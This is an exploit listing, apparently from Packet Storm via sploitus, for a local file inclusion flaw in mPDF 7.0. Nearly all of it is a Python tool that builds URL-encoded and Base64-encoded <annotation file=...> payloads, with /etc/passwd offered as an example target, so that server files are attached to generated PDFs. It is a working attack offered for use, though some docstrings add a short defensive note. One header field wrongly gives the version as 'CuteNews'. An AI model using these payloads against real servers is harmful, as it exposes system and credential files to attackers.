## https://sploitus.com/exploit?id=PACKETSTORM:167897
# Exploit Title: mPDF 7.0 - Local File Inclusion  
# Google Dork: N/A  
# Date: 2022-07-23  
# Exploit Author: Musyoka Ian  
# Vendor Homepage: https://mpdf.github.io/  
# Software Link: https://mpdf.github.io/  
# Version: CuteNews  
# Tested on: Ubuntu 20.04, mPDF 7.0.x  
# CVE: N/A  
  
#!/usr/bin/env python3  
  
from urllib.parse import quote  
from cmd import Cmd  
from base64 import b64encode  
  
class Terminal(Cmd):
    """Interactive prompt that treats every entered line as a file path.

    No ``do_*`` commands are defined, so ``Cmd`` routes each non-empty
    line that is not a built-in command to :meth:`default`.
    """

    # Shown before each read; the leading newline separates it from the
    # output of the previous line.
    prompt = "\nFile >> "

    def default(self, args):
        """Pass the entered line unchanged to ``payload_gen``.

        Args:
            args: The raw line typed at the prompt, used as the file path
                placed in the generated ``<annotation>`` markup.
        """
        payload_gen(args)
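def banner():
    """Print the tool's ASCII-art banner to stdout.

    The art is kept in a raw string. It contains many backslashes that are
    not valid escape sequences (``\\|``, ``\\_``, ``\\/`` ...); in a normal
    string literal these raise a SyntaxWarning on recent Python versions.
    A raw literal yields exactly the same text without the warning.

    Returns:
        None. The banner is written with ``print``.
    """
    art = r""" _____ _____ ______ ______ ___ __ __ _ _ _   
| __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) |   
_ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_   
| '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|  
| | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_   
|_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|  
| |   
|_| """
    print(art)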
def payload_gen(fname):
    """Print the ``<annotation>`` markup for *fname* in two encodings.

    The markup relies on mPDF's ``<annotation file="...">`` tag, which
    attaches the named server-side file to the rendered PDF. Where
    untrusted HTML reaches mPDF this discloses local files to whoever
    receives the PDF.

    Defensive note: the exposure is closed by not letting user-supplied
    markup carry ``<annotation>`` tags into mPDF and by leaving annotation
    file embedding disabled (mPDF's ``allowAnnotationFiles`` configuration
    key in releases that have it).

    Args:
        fname: File path inserted verbatim into the ``file``, ``content``
            and ``title`` attributes. It is not escaped here.

    Returns:
        None. Both encodings are written to stdout.
    """
    annotation_tag = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'

    # First form: percent-encoded markup (``/`` is left as-is by quote()).
    url_encoded = quote(annotation_tag)
    # Second form: Base64 of the *percent-encoded* text, not of the raw tag.
    b64_text = b64encode(url_encoded.encode()).decode()

    print("[+] Replace the content with the payload below")
    print(f"Url encoded payload:\n{url_encoded}\n")
    print(f"Base64 encoded payload:\n{b64_text}\n")
if __name__ == "__main__":
    # Script entry point: show the banner and a usage hint, then hand
    # control to the interactive prompt until the user interrupts it.
    banner()
    print("Enter Filename eg. /etc/passwd")
    Terminal().cmdloop()